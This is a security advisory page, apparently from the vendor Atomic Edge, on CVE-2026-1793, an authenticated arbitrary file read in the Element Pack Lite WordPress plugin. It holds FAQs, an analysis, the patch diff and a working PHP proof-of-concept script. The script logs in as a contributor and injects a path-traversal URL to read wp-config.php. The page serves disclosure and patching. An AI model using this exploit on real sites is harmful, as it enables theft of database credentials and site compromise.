What is CVE-2026-1793?

CVE-2026-1793 is a medium severity vulnerability found in the Element Pack Addons for Elementor plugin for WordPress. It allows authenticated users with contributor-level access or higher to read arbitrary files on the server due to insufficient file validation in the SVG widget’s render_svg function.

How does the vulnerability work?

The vulnerability arises from the render_svg function, which improperly processes user-supplied SVG file URLs. Attackers can exploit this by crafting SVG widget configurations that include path traversal sequences or file:// URLs, allowing them to read sensitive files from the server.

Who is affected by this vulnerability?

Any WordPress site using the bdthemes-element-pack-lite plugin version 8.3.17 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the bdthemes-element-pack-lite plugin installed. If it is version 8.3.17 or earlier, your site is vulnerable and should be updated immediately.

How can I fix CVE-2026-1793?

To fix CVE-2026-1793, update the Element Pack Addons for Elementor plugin to version 8.3.18 or later. This version includes a patch that adds path traversal checks and ensures files are only read from the designated upload directory.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while authentication is required to exploit the vulnerability, it can still lead to significant risks, such as unauthorized access to sensitive information.

What types of files could be exposed through this vulnerability?

Exploiting this vulnerability could allow attackers to read sensitive files such as the WordPress configuration file (wp-config.php), system files like /etc/passwd, or other files containing sensitive credentials and configuration details.

What is the role of the proof of concept (PoC)?

The proof of concept (PoC) demonstrates how an authenticated user can exploit the vulnerability to read sensitive files. It outlines the steps to authenticate and retrieve a file using crafted requests, illustrating the risk posed by the vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider restricting access to the WordPress admin area to trusted users only. Additionally, monitor your server logs for any suspicious activity and review file permissions to limit potential exploitation.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins and themes are kept up to date. Implement security plugins, use strong passwords, and regularly back up your site to enhance overall security.

How does this vulnerability compare to other vulnerabilities?

While CVE-2026-1793 is classified as medium severity, its implications can be serious, especially if sensitive files are exposed. It is crucial to treat all vulnerabilities seriously and apply patches promptly to maintain site security.

What is the significance of the patch introduced in version 8.3.18?

The patch in version 8.3.18 introduces multiple defense layers, including checks for path traversal sequences and ensuring that resolved paths remain within the designated upload directory. These improvements significantly reduce the risk of arbitrary file reads.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1793: Element Pack Addons for Elementor <= 8.3.17 – Authenticated (Contributor+) Arbitrary File Read (bdthemes-element-pack-lite)

CVE ID CVE-2026-1793

Plugin bdthemes-element-pack-lite

Severity Medium (CVSS 6.5)

CWE 22

Vulnerable Version 8.3.17

Patched Version 8.3.18

Disclosed February 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1793:
This vulnerability is an authenticated arbitrary file read flaw in the Element Pack Addons for Elementor WordPress plugin. The SVG widget’s render_svg function lacks proper path validation, allowing contributors and higher-privileged users to read arbitrary server files. The CVSS score of 6.5 reflects the authentication requirement and confidentiality impact.

The root cause resides in the render_svg function within /modules/svg-image/widgets/svg-image.php. The vulnerable code (lines 854-864) processes user-supplied SVG file URLs. It converts these URLs to local file system paths without validating if the resolved path remains within the intended upload directory. The function extracts a relative path from the URL and directly appends it to the base directory, enabling directory traversal sequences.

Exploitation requires an authenticated attacker with at least contributor-level access. The attacker crafts a malicious SVG widget configuration containing a file:// URL or a path traversal sequence in the svg_file parameter. When the widget renders, the render_svg function processes this input, converts it to a local path, and reads the file contents. The attacker can then exfiltrate sensitive files like wp-config.php, /etc/passwd, or other configuration files.

The patch introduces multiple defense layers. It adds a path traversal check by rejecting any relative_path containing ‘..’ sequences. The code now uses realpath() to resolve symbolic links and normalize paths. It verifies that the resolved real_path is within the real_base upload directory using strpos() comparison. The patch also adds an is_file() check to prevent directory listing. These changes ensure files are only read from within the designated upload directory.

Successful exploitation exposes sensitive server files to authenticated attackers. This includes WordPress configuration files containing database credentials, secret keys, and API tokens. System files like /etc/passwd or SSH keys may also be accessible. While the vulnerability does not directly enable remote code execution, the exposed credentials often lead to complete site compromise through database access or privilege escalation.

Differential between vulnerable and patched code

Code Diff

--- a/bdthemes-element-pack-lite/bdthemes-element-pack-lite.php
+++ b/bdthemes-element-pack-lite/bdthemes-element-pack-lite.php
@@ -4,14 +4,14 @@
  * Plugin Name: Element Pack Lite - Addons for Elementor
  * Plugin URI: http://elementpack.pro/
  * Description: The all-new <a href="https://elementpack.pro/">Element Pack</a> brings incredibly advanced, and super-flexible widgets, and A to Z essential addons to the Elementor page builder for WordPress. Explore expertly-coded widgets with first-class support by experts.
- * Version: 8.3.17
+ * Version: 8.3.18
  * Author: BdThemes
  * Author URI: https://bdthemes.com/
  * Text Domain: bdthemes-element-pack
  * Domain Path: /languages
  * License: GPL3
  * Elementor requires at least: 3.28
- * Elementor tested up to: 3.34.4
+ * Elementor tested up to: 3.35.0
  */


@@ -82,7 +82,7 @@
 if ( ! element_pack_pro_installed() ) {

 	// Some pre defined value for easy use
-	define( 'BDTEP_VER', '8.3.17' );
+	define( 'BDTEP_VER', '8.3.18' );
 	define( 'BDTEP_TPL_DB_VER', '1.0.0' );
 	define( 'BDTEP__FILE__', __FILE__ );
 	if ( ! defined( 'BDTEP_TITLE' ) ) {
--- a/bdthemes-element-pack-lite/modules/svg-image/widgets/svg-image.php
+++ b/bdthemes-element-pack-lite/modules/svg-image/widgets/svg-image.php
@@ -854,14 +854,24 @@
 		if ( ! empty( $svg_file ) ) {
 			// Try to get the SVG file contents
 			if ( strpos( $svg_file, get_site_url() ) === 0 ) {
-				// Local file, convert URL to path
+				// Local file, convert URL to path with path traversal protection
 				$upload_dir = wp_upload_dir();
-				$baseurl = $upload_dir['baseurl'];
-				$basedir = $upload_dir['basedir'];
+				$baseurl    = $upload_dir['baseurl'];
+				$basedir    = $upload_dir['basedir'];
 				if ( strpos( $svg_file, $baseurl ) === 0 ) {
-					$svg_path = $basedir . substr( $svg_file, strlen( $baseurl ) );
-					if ( file_exists( $svg_path ) ) {
-						$svg_content = file_get_contents( $svg_path );
+					$relative_path = substr( $svg_file, strlen( $baseurl ) );
+					$relative_path = ltrim( $relative_path, '/' );
+					// Reject path traversal sequences
+					if ( strpos( $relative_path, '..' ) === false ) {
+						$svg_path  = $basedir . ( $relative_path !== '' ? '/' . $relative_path : '' );
+						$real_path = realpath( $svg_path );
+						$real_base = realpath( $basedir );
+						// Ensure resolved path is inside upload directory
+						if ( $real_path !== false && $real_base !== false && ( $real_path === $real_base || strpos( $real_path, $real_base . DIRECTORY_SEPARATOR ) === 0 ) ) {
+							if ( file_exists( $real_path ) && is_file( $real_path ) ) {
+								$svg_content = file_get_contents( $real_path );
+							}
+						}
 					}
 				}
 			}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1793 - Element Pack Addons for Elementor <= 8.3.17 - Authenticated (Contributor+) Arbitrary File Read
<?php

$target_url = 'http://target-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';
$file_to_read = '../../../../wp-config.php';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Extract nonce from Elementor editor page
$editor_url = $target_url . '/wp-admin/post-new.php?post_type=page';
curl_setopt_array($ch, [
    CURLOPT_URL => $editor_url,
    CURLOPT_HTTPGET => true
]);
$response = curl_exec($ch);

preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Create a page with malicious SVG widget
$create_page_url = $target_url . '/wp-admin/admin-ajax.php';
$widget_settings = json_encode([
    'svg_image' => [
        'svg_file' => [
            'url' => $target_url . '/wp-content/uploads/' . $file_to_read
        ]
    ]
]);

$post_data = [
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'action_id' => 'save_builder',
        'editor_post_id' => 'new',
        'data' => [
            'elements' => [[
                'id' => 'exploit_widget',
                'elType' => 'widget',
                'settings' => $widget_settings,
                'widgetType' => 'svg-image'
            ]]
        ]
    ]),
    '_nonce' => $nonce
];

curl_setopt_array($ch, [
    CURLOPT_URL => $create_page_url,
    CURLOPT_POSTFIELDS => $post_data
]);
$response = curl_exec($ch);

// Step 4: Extract file contents from response
preg_match('/<svg[^>]*>(.*?)</svg>/s', $response, $file_matches);
if (!empty($file_matches[1])) {
    echo "File contents:n" . html_entity_decode($file_matches[1]);
} else {
    echo "Exploit failed. Check authentication and nonce.";
}

curl_close($ch);
unlink($cookie_file);

?>

Frequently Asked Questions

What is CVE-2026-1793?
Overview of the vulnerability
CVE-2026-1793 is a medium severity vulnerability found in the Element Pack Addons for Elementor plugin for WordPress. It allows authenticated users with contributor-level access or higher to read arbitrary files on the server due to insufficient file validation in the SVG widget’s render_svg function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the render_svg function, which improperly processes user-supplied SVG file URLs. Attackers can exploit this by crafting SVG widget configurations that include path traversal sequences or file:// URLs, allowing them to read sensitive files from the server.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the bdthemes-element-pack-lite plugin version 8.3.17 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the bdthemes-element-pack-lite plugin installed. If it is version 8.3.17 or earlier, your site is vulnerable and should be updated immediately.
How can I fix CVE-2026-1793?
Patch and update instructions
To fix CVE-2026-1793, update the Element Pack Addons for Elementor plugin to version 8.3.18 or later. This version includes a patch that adds path traversal checks and ensures files are only read from the designated upload directory.
What does the CVSS score of 6.5 mean?
Understanding severity levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while authentication is required to exploit the vulnerability, it can still lead to significant risks, such as unauthorized access to sensitive information.
What types of files could be exposed through this vulnerability?
Potential sensitive data at risk
Exploiting this vulnerability could allow attackers to read sensitive files such as the WordPress configuration file (wp-config.php), system files like /etc/passwd, or other files containing sensitive credentials and configuration details.
What is the role of the proof of concept (PoC)?
Demonstrating the vulnerability
The proof of concept (PoC) demonstrates how an authenticated user can exploit the vulnerability to read sensitive files. It outlines the steps to authenticate and retrieve a file using crafted requests, illustrating the risk posed by the vulnerability.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider restricting access to the WordPress admin area to trusted users only. Additionally, monitor your server logs for any suspicious activity and review file permissions to limit potential exploitation.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins and themes are kept up to date. Implement security plugins, use strong passwords, and regularly back up your site to enhance overall security.
How does this vulnerability compare to other vulnerabilities?
Contextualizing the risk
While CVE-2026-1793 is classified as medium severity, its implications can be serious, especially if sensitive files are exposed. It is crucial to treat all vulnerabilities seriously and apply patches promptly to maintain site security.
What is the significance of the patch introduced in version 8.3.18?
Details on the patch improvements
The patch in version 8.3.18 introduces multiple defense layers, including checks for path traversal sequences and ensuring that resolved paths remain within the designated upload directory. These improvements significantly reduce the risk of arbitrary file reads.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations